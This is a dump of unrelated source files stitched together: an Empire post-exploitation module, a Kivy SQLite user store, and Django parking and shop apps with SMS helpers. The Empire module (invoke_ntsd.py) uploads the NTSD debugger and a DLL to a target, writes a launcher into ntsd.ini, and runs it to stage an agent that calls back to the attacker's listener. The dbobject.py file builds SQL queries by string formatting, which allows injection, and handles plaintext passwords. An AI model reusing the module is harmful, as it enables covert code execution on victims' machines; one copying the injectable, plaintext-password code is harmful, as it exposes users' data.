ven = '0x' + open(f'{path}/id/vendor', 'r').read().strip()
except:
continue
else:
if ven and dev:
name = self.pci.get_item(dev[2:], ven[2:], types='usb')
if not name:
continue
self.info['Input'].append({
name.get('device', 'Unknown'): {
'Device ID': dev,
'Vendor': ven
}
})
``` |
{
"source": "1r-f0rhun73r/Empire",
"score": 2
} |
#### File: powershell/code_execution/invoke_ntsd.py
```python
from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
import base64
class Module(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Ntsd',
'Author': ['<NAME>'],
'Description': ("Use NT Symbolic Debugger to execute Empire launcher code"),
'Software': '',
'Techniques': ['T1127'],
'Background': True,
'OutputExtension': None,
'NeedsAdmin': False,
'OpsecSafe': False,
'Language': 'powershell',
'MinLanguageVersion': '2',
'Comments': [""]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent': {
'Description': 'Agent to run module on.',
'Required': True,
'Value': ''
},
'UploadPath': {
'Description': r'Path to drop dll (C:\Users\Administrator\Desktop).',
'Required': False,
'Value': ''
},
'Listener': {
'Description': 'Listener to use.',
'Required': True,
'Value': ''
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'BinPath': {
'Description': 'Binary to set NTSD to debug.',
'Required': True,
'Value': "C:\\Windows\\System32\\calc.exe"
},
'Arch': {
'Description': 'Architecture the system is on.',
'Required': True,
'Value': 'x64'
},
'ProxyCreds': {
'Description': r'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
uploadPath = self.options['UploadPath']['Value'].strip()
bin = self.options['BinPath']['Value']
arch = self.options['Arch']['Value']
ntsd_exe_upload_path = uploadPath + "\\" + "ntsd.exe"
ntsd_dll_upload_path = uploadPath + "\\" + "ntsdexts.dll"
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
if arch == 'x64':
ntsd_exe = self.mainMenu.installPath + "data/module_source/code_execution/ntsd_x64.exe"
ntsd_dll = self.mainMenu.installPath + "data/module_source/code_execution/ntsdexts_x64.dll"
elif arch == 'x86':
ntsd_exe = self.mainMenu.installPath + "data/module_source/code_execution/ntsd_x86.exe"
ntsd_dll = self.mainMenu.installPath + "data/module_source/code_execution/ntsdexts_x86.dll"
# read in the common module source code
moduleSource = self.mainMenu.installPath + "data/module_source/code_execution/Invoke-Ntsd.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = ""
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print(helpers.color("[!] Invalid listener: %s" % (listenerName)))
return ''
else:
l = self.mainMenu.stagers.stagers['multi/launcher']
l.options['Listener']['Value'] = self.options['Listener']['Value']
l.options['UserAgent']['Value'] = self.options['UserAgent']['Value']
l.options['Proxy']['Value'] = self.options['Proxy']['Value']
l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value']
launcher = l.generate()
if launcher == '':
print(helpers.color('[!] Error in launcher generation.'))
return ''
else:
launcherCode = launcher.split(' ')[-1]
with open(ntsd_exe, 'rb') as bin_data:
ntsd_exe_data = bin_data.read()
with open(ntsd_dll, 'rb') as bin_data:
ntsd_dll_data = bin_data.read()
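        # Build the ntsd.ini contents (via Write-Ini) holding the launcher, and the NTSD command line that debugs the target binary with that script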
exec_write = "Write-Ini %s \"%s\"" % (uploadPath, launcher)
code_exec = "%s\\ntsd.exe -cf %s\\ntsd.ini %s" % (uploadPath, uploadPath, bin)
ntsd_exe_upload = self.mainMenu.stagers.generate_upload(ntsd_exe_data, ntsd_exe_upload_path)
ntsd_dll_upload = self.mainMenu.stagers.generate_upload(ntsd_dll_data, ntsd_dll_upload_path)
script += "\r\n"
script += ntsd_exe_upload
script += ntsd_dll_upload
script += "\r\n"
script += exec_write
script += "\r\n"
# this is to make sure everything was uploaded properly
script += "Start-Sleep -s 5"
script += "\r\n"
script += code_exec
return script
``` |
{
"source": "1rfan/kivymd_skeletor_mobi",
"score": 3
} |
#### File: 1rfan/kivymd_skeletor_mobi/dbobject.py
```python
import sqlite3
class DbObject():
def __init__(self, dbname):
self.dbname = dbname
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
# create tables...
cmd = """CREATE TABLE IF NOT EXISTS tbl_users(
id INTEGER PRIMARY KEY AUTOINCREMENT,
login VARCHAR NOT NULL,
name VARCHAR NOT NULL,
email VARCHAR,
passwd VARCHAR NOT NULL,
active INTEGER NOT NULL)"""
self.curs.execute(cmd)
self.conn.commit()
# self.conn.close()
cmd = """CREATE TABLE IF NOT EXISTS tbl_curr_user(
currid INTEGER,
active INTEGER NOT NULL)"""
self.curs.execute(cmd)
self.conn.commit()
self.conn.close()
# reset tbl_curr_user to null (truncate)..
self.trc_tbl('tbl_curr_user')
# check if admin login already created...
if(self.chk_login_pwd('admin', '<PASSWORD>123') == 0):
# insert default admin login
self.ins_tbl_users('admin', 'Administrator',
'<EMAIL>', 'admin123', 1)
# insert into table tbl_B...
def ins_tbl_users(self, login, name, email, passwd, active):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = """INSERT INTO tbl_users(login, name, email, passwd, active)
VALUES(?,?,?,?,?)"""
data_tuple = (login, name, email, passwd, active)
self.curs.execute(sqltext, data_tuple)
self.conn.commit()
self.conn.close()
def viw_tbl_users(self):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = "SELECT * FROM tbl_users"
self.curs.execute(sqltext)
rows = self.curs.fetchall()
self.conn.close()
return rows
def chk_login_pwd(self, login, pwd):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = "SELECT EXISTS(SELECT 1 FROM tbl_users WHERE login='{}' AND passwd='{}' LIMIT 1)".format(
login, pwd)
self.curs.execute(sqltext)
row = self.curs.fetchone()
self.conn.close()
return row[0]
def chk_exist_user(self, login):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = "SELECT EXISTS(SELECT 1 FROM tbl_users WHERE login='{}' LIMIT 1)".format(
login)
self.curs.execute(sqltext)
row = self.curs.fetchone()
self.conn.close()
return row[0]
def get_user_id(self, login):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = "SELECT id FROM tbl_users WHERE login='{}' LIMIT 1".format(
login)
self.curs.execute(sqltext)
row = self.curs.fetchone()
self.conn.close()
return row[0]
def get_user_name(self, id):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = "SELECT name FROM tbl_users WHERE id='{}' LIMIT 1".format(
id)
self.curs.execute(sqltext)
row = self.curs.fetchone()
self.conn.close()
return row[0]
def get_user_email(self, id):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = "SELECT email FROM tbl_users WHERE id='{}' LIMIT 1".format(
id)
self.curs.execute(sqltext)
row = self.curs.fetchone()
self.conn.close()
return row[0]
def get_user_pswd(self, id):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = "SELECT passwd FROM tbl_users WHERE id='{}' LIMIT 1".format(
id)
self.curs.execute(sqltext)
row = self.curs.fetchone()
self.conn.close()
return row[0]
def upd_curr_user(self, id):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = """INSERT INTO tbl_curr_user(currid,active)
VALUES(?,?)"""
data_tuple = (id, 1)
self.curs.execute(sqltext, data_tuple)
self.conn.commit()
self.conn.close()
def upd_user_passwd(self, id, nupwd):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = """UPDATE tbl_users SET passwd = '{}' WHERE id = {}""".format(
nupwd, id)
print(sqltext)
self.curs.execute(sqltext)
self.conn.commit()
self.conn.close()
def trc_tbl(self, tbl_name):
self.conn = sqlite3.connect(self.dbname)
self.curs = self.conn.cursor()
sqltext = "DELETE FROM "+tbl_name
self.curs.execute(sqltext)
self.conn.commit()
self.conn.close()
# return 1
``` |
{
"source": "1ricardo66/Django2.0",
"score": 3
} |
#### File: Estacionamento/core/models.py
```python
from django.db import models
import math
from random import randint
#############################################################
# #
# #
# IMPLEMENT A CAR CATEGORY METHOD #
# DEPENDING ON THE CATEGORY, THE HOURLY RATE CHANGES #
# #
# #
#############################################################
class Cliente(models.Model):
nome = models.CharField(max_length=60)
data_de_nascimento = models.DateField()
cpf = models.CharField(max_length=11)
endereco = models.CharField(max_length=180)
Bairro = models.CharField(max_length=60)
key = models.IntegerField()
def __str__(self):
return self.nome
    # Receives all the clients
class Veiculo(models.Model):
nome = models.CharField(max_length=120,null=True,blank=True)
modelo = models.CharField(max_length=120)
placa = models.CharField(max_length=9)
    # Sets the vehicles in a form
def __str__(self):
content = (self.nome + ' - ' + self.placa)
return content
class Parametros(models.Model):
valor_hora = models.DecimalField(max_digits=5,decimal_places=2)
valor_mes = models.DecimalField(max_digits=5,decimal_places=2)
def __str__(self):
return "Parametros Gerais"
    # Parameters - edit later
class MovRotativo(models.Model):
cliente = models.ForeignKey(Cliente,on_delete=models.CASCADE)
checkin = models.DateTimeField(auto_now=False)
checkout = models.DateTimeField(auto_now=False)
valor_hora = models.DecimalField(max_digits=5,decimal_places=2)
veiculo = models.ForeignKey(Veiculo,on_delete=models.CASCADE)
pago = models.BooleanField(default=False)
def horas_total(self):
return math.ceil((self.checkout - self.checkin).total_seconds() / 3600)
    # Function to get the hours /// total_seconds() comes from Python's timedelta, not from Django
def total (self):
self.valor_total = self.valor_hora * self.horas_total()
return ("%s R$"%self.valor_total)
def __str__(self):
return self.veiculo.placa
class Mensalista(models.Model):
veiculo = models.ForeignKey(Veiculo,on_delete=models.CASCADE)
inicio = models.DateField()
valor_mes = models.DecimalField(max_digits=5,decimal_places=2)
def __str__(self):
return str(self.veiculo) + ' - ' + str(self.inicio)
    # Monthly plan - edit later
class MovMensalista(models.Model):
mensalista = models.ForeignKey(Mensalista,on_delete=models.CASCADE)
data_pagamento = models.DateField()
total = models.DecimalField(max_digits=5,decimal_places=2)
    # returns the total amount for the month
# Create your models here.
```
#### File: Estacionamento/core/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from .models import *
def lista_pessoas(request):
pessoa = Cliente.objects.all()
context = {'cliente':pessoa}
return render(request,'core/lista_pessoas.html',context)
def lista_veiculos(request):
veiculos = Veiculo.objects.all()
context = {'veiculos':veiculos}
return render(request,'core/lista_veiculos.html',context)
def movRotativo(request):
mov_rot = MovRotativo.objects.all()
context = {'mov_rot':mov_rot}
return render(request,'core/mov_rotativo.html',context)
# Create your views here.
```
#### File: Geekie/Core/views.py
```python
from django.shortcuts import render
from .models import Cadastro
def index(request):
pessoa = Cadastro.objects.all()
x=pessoa
context = {'pessoa':pessoa,
'x':x,}
return render(request,'core/index.html',context)
# Create your views here.
``` |
{
"source": "1rodriguez/shell-hacks-2020",
"score": 2
} |
#### File: 1rodriguez/shell-hacks-2020/job.py
```python
import firebase_interface
import re
class Job:
def __init__(self, gh_id, job_type, company, location, title, description):
self.id_code = gh_id
self.job_type = job_type
self.company = company
self.location = location
self.title = title
self.description = description
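        # strip HTML tags and leftover attribute/href fragments so Firestore receives a plain-text description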
desc_removed_tags = re.sub("(\<\/?[a-z]*\>)|(\<\/?[a-z*]|\d\>)", "",
self.description)
self.sanitized_description = re.sub("\<([a-z*])\s([a-z*]*=.*?)", "",
desc_removed_tags)
self.sanitized_description = re.sub('href=".*?">', "", self.sanitized_description)
def write_to_firestore(self):
doc_ref = firebase_interface.db.collection(u'postings') \
.document(self.id_code)
doc_ref.set({
u'type': self.job_type,
u'company': self.company,
u'location': self.location,
u'position': self.title,
u'plain_description': self.sanitized_description,
})
``` |
{
"source": "1-rphillips/office-recipes",
"score": 2
} |
#### File: office-recipes/Office2019-IndividualApps/MSOffice2019VersionProvider.py
```python
import plistlib
import re
from autopkglib import Processor, ProcessorError
try:
    from urllib.request import urlopen, Request # For Python 3
except ImportError:
    from urllib2 import urlopen, Request # For Python 2
__all__ = ["MSOffice2019VersionProvider"]
# Installers are all supposed to be multilingual.
# Only Locale and Channel (Prod vs. Insider Slow/Fast) options available
BASE_URL = "https://officecdn.microsoft.com/pr/%s/MacAutoupdate/0409%s2019.xml"
PROD_DICT = {
'Excel': ['XCEL', '525135'],
'OneNote': ['ONMC', '820886'],
'Outlook': ['OPIM', '525137'],
'PowerPoint': ['PPT3', '525136'],
'Word': ['MSWD', '525134']
}
CHANNELS = {
'Production': 'C1297A47-86C4-4C1F-97FA-950631F94777',
'InsiderSlow': '1AC37578-5A24-40FB-892E-B89D85B6DFAA',
'InsiderFast': '4B2D7701-0A4F-49C8-B4CB-0C2D4043F51F',
}
DEFAULT_CHANNEL = "Production"
class MSOffice2019VersionProvider(Processor):
"""Provides the version for an individual, standalone MS Office 2019 product."""
input_variables = {
"product": {
"required": True,
"description": "Name of product to fetch, e.g. Excel.",
},
"channel": {
"required": False,
"default": DEFAULT_CHANNEL,
"description":
("Update feed channel that will be checked for updates. "
"Defaults to %s, acceptable values are one of: %s"
% (DEFAULT_CHANNEL,
", ".join(CHANNELS.keys())))
}
}
output_variables = {
"version": {
"description":
("The installer version as extracted from the Microsoft metadata.")
},
}
def get_version(self, metadata):
"""Extracts the version of the update item."""
# We currently expect the version at the end of the Title key,
# e.g.: "Excel Update 16.19.0 (18110915)"
# Work backwards from the end and break on the first thing
# that looks like a version
match = None
for element in reversed(metadata["Title"].split()):
match = re.match(r"(\d+\.\d+(\.\d)*)", element)
if match:
break
if not match:
raise ProcessorError(
"Error validating Office 2019 version extracted "
"from Title manifest value: '%s'" % metadata["Title"])
version = match.group(0)
return version
def main(self):
"""Gets info about the installer in a channel from MAU metadata."""
self.env["URL"] = "https://go.microsoft.com/fwlink/?linkid=%s" % (PROD_DICT[self.env["product"]][1])
channel_input = self.env.get("channel", DEFAULT_CHANNEL)
if channel_input not in CHANNELS.keys():
raise ProcessorError(
"'channel' input variable must be one of: %s or a custom "
"uuid" % (", ".join(CHANNELS.keys())))
base_url = BASE_URL % (CHANNELS[channel_input], PROD_DICT[self.env["product"]][0])
        # Build a Request object for the metadata URL so headers can be attached below
        req = Request(base_url)
# Add the MAU User-Agent, since MAU feed server seems to explicitly
# block a User-Agent of 'Python-urllib/2.7' - even a blank User-Agent
# string passes.
req.add_header("User-Agent",
"Microsoft%20AutoUpdate/3.6.16080300 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)")
try:
fdesc = urlopen(req)
data = fdesc.read()
fdesc.close()
except BaseException as err:
raise ProcessorError("Can't download %s: %s" % (base_url, err))
metadata = plistlib.readPlistFromString(data)[0]
self.env["version"] = self.get_version(metadata)
if __name__ == "__main__":
PROCESSOR = MSOffice2019VersionProvider()
PROCESSOR.execute_shell()
``` |
{
"source": "1SAA/ColossalAI",
"score": 2
} |
#### File: colossalai/gemini/stateful_tensor_mgr.py
```python
import functools
import torch
import types
from colossalai.utils.cuda import get_current_device
from colossalai.gemini.tensor_utils import colo_model_data_tensor_move_inline, colo_tensor_mem_usage
from colossalai.gemini.stateful_tensor import StatefulTensor, TensorState
from colossalai.gemini.tensor_placement_policy import TensorPlacementPolicy
from typing import List
class StatefulTensorMgr(object):
"""
Stateful Tensor Manager, inspired from PatrickStar
PatrickStar: Parallel Training of Pre-trained Models via Chunk-based Memory Management
https://arxiv.org/abs/2108.05818
"""
def __init__(self, tensor_placement_policy: TensorPlacementPolicy) -> None:
self._tensor_placement_policy: TensorPlacementPolicy = tensor_placement_policy
self._stateful_tensor_list: List[StatefulTensor] = []
self._compute_list: List[StatefulTensor] = []
self._compute_idx: int = -1
self._cpu_gpu_move_volume = 0
self._warmup = True
def register_stateful_tensor_list(self, tensor_list: List[StatefulTensor]) -> None:
assert self._stateful_tensor_list == [], "Can't register stateful tensors for manager twice"
self._stateful_tensor_list = tensor_list
for t in self._stateful_tensor_list:
assert isinstance(t, StatefulTensor)
t.trans_state = types.MethodType(functools.partial(self._trans_state, t.trans_state), t)
def start_iter(self):
pass
def finish_iter(self):
"""This function must be called when each iteration finishes
"""
self._warmup = False
self._compute_idx = -1
self._cpu_gpu_move_volume = 0
def adjust_layout(self) -> None:
""" Adjust the layout of statefuil tensor according to the information provided
by mem_stats_collector, which should belongs to a Sharded Model.
"""
# find stateful tensor in state COMPUTE
cuda_demand = StatefulTensor.GST_MGR.state_mem['cpu'][TensorState.COMPUTE]
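        # cuda_demand: total size of CPU-resident tensors currently in the COMPUTE state, i.e. what must move to CUDA now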
move_to_cuda_tensor_list = []
hold_cuda_tensor_list = []
for tensor in self._stateful_tensor_list:
if tensor.state == TensorState.FREE:
continue
if tensor.device.type == 'cuda':
if tensor.state in [TensorState.HOLD, TensorState.HOLD_AFTER_BWD, TensorState.HOLD_AFTER_FWD]:
hold_cuda_tensor_list.append(tensor)
elif tensor.device.type == 'cpu':
if tensor.state == TensorState.COMPUTE:
move_to_cuda_tensor_list.append(tensor)
else:
raise RuntimeError
self._cpu_gpu_move_volume += self._tensor_placement_policy.evict_tensors(hold_cuda_tensor_list,
cuda_demand=cuda_demand,
warmup=self._warmup,
compute_list=self._compute_list,
compute_idx=self._compute_idx)
# move COMPUTE tensors to CUDA
self._cpu_gpu_move_volume += cuda_demand
for t in move_to_cuda_tensor_list:
colo_model_data_tensor_move_inline(t, get_current_device())
@property
def cpu_gpu_move_volume(self):
return self._cpu_gpu_move_volume
def _trans_state(self, trans_state_func, stateful_tensor, state):
trans_state_func(state)
if state == TensorState.COMPUTE:
self._compute_idx += 1
if self._warmup:
self._compute_list.append(stateful_tensor)
```
#### File: utils/model/colo_init_context.py
```python
from colossalai.utils.cuda import get_current_device
from .utils import InsertPostInitMethodToModuleSubClasses
import torch
# from colossalai.logging import get_dist_logger
from colossalai.tensor import ColoTensor
# _orig_torch_empty = torch.empty
class ColoInitContext(InsertPostInitMethodToModuleSubClasses):
def __init__(self, lazy_memory_allocate: bool = False, device: torch.device = torch.device('cpu')):
"""
Args:
lazy_memory_allocate (bool, optional): whether to allocate memory for the parameter tensors. Defaults to False.
device (torch.device, optional): the device parameters initialized are resident on. Defaults to torch.device('cpu').
"""
super().__init__()
self._lazy_memory_allocate = lazy_memory_allocate
self._device = device
def _post_init_method(self, module: torch.nn.Module, *args, **kwargs):
"""
The function to call at the end of the constructor of each module.
FIXME(fjr) The module may be passed to this function multiple times?
"""
name_list = []
for name, param in module.named_parameters():
if isinstance(param, ColoTensor):
continue
name_list.append((name, param))
save_torch_payload = True if not self._lazy_memory_allocate else False
for name, param in name_list:
delattr(module, name)
setattr(module, name,
ColoTensor.init_from_torch_tensor(tensor=param.to(self._device), save_payload=save_torch_payload))
```
#### File: tests/test_gemini/test_stateful_tensor_mgr.py
```python
import torch
import colossalai
import pytest
import torch.multiprocessing as mp
from colossalai.utils.cuda import get_current_device
from colossalai.gemini.memory_tracer import MemStatsCollector
from colossalai.gemini.memory_tracer import GLOBAL_MODEL_DATA_TRACER
from colossalai.utils.memory import colo_set_process_memory_fraction
from colossalai.zero.sharded_param.sharded_param import ShardedParamV2
from colossalai.gemini.stateful_tensor import TensorState
from colossalai.utils import free_port
from colossalai.testing import rerun_if_address_is_in_use
from torch.nn.parameter import Parameter
from typing import List
from functools import partial
from colossalai.gemini import StatefulTensorMgr
from colossalai.gemini.tensor_placement_policy import AutoTensorPlacementPolicy
class Net(torch.nn.Module):
def __init__(self) -> None:
super().__init__()
# each parameter is 128 MB
self.p0 = Parameter(torch.empty(1024, 1024, 32))
self.p1 = Parameter(torch.empty(1024, 1024, 32))
self.p2 = Parameter(torch.empty(1024, 1024, 32))
def limit_cuda_memory(memory_in_g: float):
cuda_capacity = torch.cuda.get_device_properties(get_current_device()).total_memory
fraction = (memory_in_g * 1024**3) / cuda_capacity
colo_set_process_memory_fraction(fraction)
def run_stm():
    # warmup phase uses ~20% of CUDA memory to store params
# only 2 params can be on CUDA
limit_cuda_memory(1.26)
model = Net()
for p in model.parameters():
p.colo_attr = ShardedParamV2(p, set_data_none=True)
GLOBAL_MODEL_DATA_TRACER.register_model(model)
mem_collector = MemStatsCollector()
tensor_placement_policy = AutoTensorPlacementPolicy(mem_stats_collector=mem_collector)
stateful_tensor_mgr = StatefulTensorMgr(tensor_placement_policy)
for p in model.parameters():
stateful_tensor_mgr.register_stateful_param(p.colo_attr)
mem_collector.start_collection()
# Compute order: 0 1 2 0 1
# warmup
# use naive eviction strategy
apply_adjust(model, model.p0, [model.p0], stateful_tensor_mgr)
mem_collector.sample_model_data()
mem_collector.sample_overall_data()
apply_adjust(model, model.p1, [model.p0, model.p1], stateful_tensor_mgr)
mem_collector.sample_model_data()
mem_collector.sample_overall_data()
apply_adjust(model, model.p2, [model.p1, model.p2], stateful_tensor_mgr)
mem_collector.sample_model_data()
mem_collector.sample_overall_data()
apply_adjust(model, model.p0, [model.p0, model.p2], stateful_tensor_mgr)
mem_collector.sample_model_data()
mem_collector.sample_overall_data()
apply_adjust(model, model.p1, [model.p1, model.p2], stateful_tensor_mgr)
mem_collector.sample_model_data()
mem_collector.finish_collection()
stateful_tensor_mgr.reset()
# warmup done
# only 2 params can be on CUDA
limit_cuda_memory(0.26 / tensor_placement_policy._steady_cuda_cap_ratio)
# use OPT-like eviction strategy
apply_adjust(model, model.p0, [model.p0, model.p1], stateful_tensor_mgr)
apply_adjust(model, model.p1, [model.p0, model.p1], stateful_tensor_mgr)
apply_adjust(model, model.p2, [model.p0, model.p2], stateful_tensor_mgr)
apply_adjust(model, model.p0, [model.p0, model.p2], stateful_tensor_mgr)
apply_adjust(model, model.p1, [model.p1, model.p2], stateful_tensor_mgr)
def apply_adjust(model: torch.nn.Module, compute_param: Parameter, cuda_param_after_adjust: List[Parameter],
stateful_tensor_mgr: StatefulTensorMgr):
compute_param.colo_attr._sharded_data_tensor.trans_state(TensorState.COMPUTE)
for p in model.parameters():
if p is not compute_param and p.colo_attr._sharded_data_tensor.state != TensorState.HOLD:
p.colo_attr._sharded_data_tensor.trans_state(TensorState.HOLD)
stateful_tensor_mgr.adjust_layout()
print_stats(model)
device = torch.device(torch.cuda.current_device())
cuda_param_after_adjust = [hash(p) for p in cuda_param_after_adjust]
for n, p in model.named_parameters():
if hash(p) in cuda_param_after_adjust:
assert p.colo_attr._sharded_data_tensor.device == device, f'{n} {p.colo_attr._sharded_data_tensor.device} vs {device}'
else:
assert p.colo_attr._sharded_data_tensor.device == torch.device('cpu')
def print_stats(model: torch.nn.Module):
msgs = []
for n, p in model.named_parameters():
msgs.append(f'{n}: {p.colo_attr._sharded_data_tensor.state}({p.colo_attr._sharded_data_tensor.device})')
print(f'[ {", ".join(msgs)} ]')
def run_dist(rank, world_size, port):
colossalai.launch(config={}, rank=rank, world_size=world_size, host='localhost', port=port, backend='nccl')
run_stm()
@pytest.mark.dist
@rerun_if_address_is_in_use()
def test_stateful_tensor_manager(world_size=1):
run_func = partial(run_dist, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
if __name__ == '__main__':
# this unit test can pass if available CUDA memory >= 1.5G
test_stateful_tensor_manager()
```
#### File: tests/test_tensor/test_net_tp.py
```python
from tests.components_to_test.registry import non_distributed_component_funcs
import colossalai
import pytest
import torch.multiprocessing as mp
from colossalai.testing import parameterize, rerun_if_address_is_in_use
from colossalai.utils.cuda import get_current_device
from colossalai.utils import free_port
from colossalai.utils import ColoInitContext
from functools import partial
def run_simple_net():
# A simple net with two stacked nn.Linear
get_components_func = non_distributed_component_funcs.get_callable('simple_net')
model_builder, train_dataloader, test_dataloader, optimizer_class, criterion = get_components_func()
with ColoInitContext(device=get_current_device()):
model = model_builder(checkpoint=True)
# we set the Specs for weight of each linear.
# model.proj1.weight.set_spec('1Drow')
# model.proj2.weight.set_spec('1Drow')
for i, (data, label) in enumerate(train_dataloader):
output = model(data)
if criterion:
loss = criterion(output, label)
else:
loss = output
print(loss.torch_tensor())
loss.backward()
if i > 5:
break
# TODO(jzy) check the results with col.nn.Linear?
def run_dist(rank, world_size, port):
config = dict(parallel=dict(tensor=dict(mode="1d", size=world_size),))
colossalai.launch(config=config, rank=rank, world_size=world_size, host='localhost', port=port, backend='nccl')
run_simple_net()
@pytest.mark.skip
@pytest.mark.dist
@parameterize('world_size', [1, 4])
@rerun_if_address_is_in_use()
def test_simple_net(world_size):
run_func = partial(run_dist, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
if __name__ == '__main__':
test_simple_net()
``` |
{
"source": "1samson1/parsing-bot-glory",
"score": 2
} |
#### File: parsing-bot-glory/bot/models.py
```python
from django.db import models
# Create your models here.
class Profile(models.Model):
"""Профили пользователей"""
external_id = models.PositiveIntegerField("ВК ИД")
def __str__(self):
return str(self.external_id)
class Meta:
verbose_name = "Профиль пользователя"
verbose_name_plural = "Профили пользователей"
class Subscribe(models.Model):
"""Подписки пользователей"""
profile = models.ForeignKey(Profile,verbose_name="Пользователь",on_delete=models.CASCADE)
group_subscribe = models.CharField("Подписка на группу",max_length=100)
def __str__(self):
return self.group_subscribe
class Meta:
verbose_name = "Подписки пользователей"
verbose_name_plural = "Подписки пользователей"
class SendedGroups(models.Model):
"""Группы которым отправлено рассписание"""
date = models.DateField("Дата", auto_now_add=True)
group = models.CharField("Группа",max_length=100)
def __str__(self):
return self.group
class Meta:
verbose_name = "Расписание отправленое группам"
verbose_name_plural = "Расписание отправленое группам"
``` |
{
"source": "1sanz/onnxruntime",
"score": 2
} |
#### File: onnxruntime/ci/bkpoke.py
```python
import argparse
import os
import pathlib
import subprocess
import sys
import time
import requests
GET_BUILD_URL = 'https://api.buildkite.com/v2/organizations/plaidml/pipelines/{pipeline}/builds/{number}'
CREATE_BUILD_URL = 'https://api.buildkite.com/v2/organizations/plaidml/pipelines/{pipeline}/builds'
VIEW_BUILD_URL = 'https://buildkite.com/plaidml/{pipeline}/builds/{number}'
def main():
parser = argparse.ArgumentParser()
parser.add_argument('pipeline')
args = parser.parse_args()
token = os.getenv('BUILDKITE_TOKEN')
cwd = os.getenv('CI_PROJECT_DIR')
commit = os.getenv('CI_COMMIT_SHA')
branch = os.getenv('CI_COMMIT_REF_NAME')
message = os.getenv('CI_COMMIT_TITLE')
name = subprocess.check_output(['git', 'show', '-s', '--format=%an', commit], cwd=cwd)
email = subprocess.check_output(['git', 'show', '-s', '--format=%ae', commit], cwd=cwd)
headers = {'Authorization': 'Bearer {}'.format(token)}
payload = {
'commit': commit,
'branch': branch,
'message': message,
'author': {
'name': name.decode().rstrip(),
'email': email.decode().rstrip(),
},
}
params = {
'pipeline': args.pipeline,
}
resp = requests.post(CREATE_BUILD_URL.format(**params), headers=headers, json=payload)
print(resp)
json = resp.json()
print(json)
params['number'] = json['number']
print('{}: {}'.format(json['state'], VIEW_BUILD_URL.format(**params)), flush=True)
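    # poll the Buildkite API every 30 seconds until the triggered build reports a finish time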
while json['finished_at'] is None:
time.sleep(30)
resp = requests.get(GET_BUILD_URL.format(**params), headers=headers)
json = resp.json()
print('.', end='', flush=True)
print('', flush=True)
print('{}: {}'.format(json['state'], VIEW_BUILD_URL.format(**params)), flush=True)
if json['state'] != 'passed':
sys.exit(1)
if __name__ == '__main__':
main()
``` |
{
"source": "1sarah/django_shop",
"score": 2
} |
#### File: 1sarah/django_shop/send_sms.py
```python
import os
import africastalking
from django_shop.settings import env
from twilio.rest import Client
def send(message, to_phone_number):
# the following line needs your Twilio Account SID and Auth Token
ACCOUNT_SID = env.str('ACCOUNT_SID')
TOKEN = env.str('TOKEN')
client = Client(ACCOUNT_SID, TOKEN)
# change the "from_" number to your Twilio number and the "to" number
# to the phone number you signed up for Twilio with, or upgrade your
# account to send SMS to any phone number
client.messages.create(to=to_phone_number,
from_="+14804050909",
body=message)
def send_sms(message, recipients):
username = "sandbox"
api_key = env.str('SMS_API_KEY')
africastalking.initialize(username, api_key)
sms = africastalking.SMS
try:
response = sms.send(message, recipients)
print(response)
except Exception as e:
print(f"======================Something went wrong {e}===================================")
```
#### File: django_shop/shop/models.py
```python
from django.contrib.auth.models import AbstractBaseUser, UserManager, PermissionsMixin
from django.db import models
from django.utils.translation import gettext_lazy as _
class Customer(models.Model):
name = models.CharField(max_length=200)
code = models.IntegerField(null=True)
phone_number = models.CharField(max_length=50, null=True)
def __str__(self):
return self.name
class Order(models.Model):
customer = models.ForeignKey(Customer, on_delete=models.CASCADE,
related_name='orders', blank=True, null=True)
item = models.CharField(max_length=250, null=True)
amount = models.IntegerField(null=True)
time = models.DateTimeField(auto_now_add=True, null=True)
def __str__(self):
return self.item
class User(AbstractBaseUser, PermissionsMixin):
email = models.EmailField(_('email address'), unique=True)
username = models.CharField(max_length=80)
is_superuser = models.BooleanField(default=False)
is_staff = models.BooleanField(default=False)
is_active = models.BooleanField(default=True)
tokenn = models.CharField(max_length=300)
objects = UserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username']
def __str__(self):
return self.email
```
#### File: django_shop/shop/views.py
```python
import rest_framework.decorators
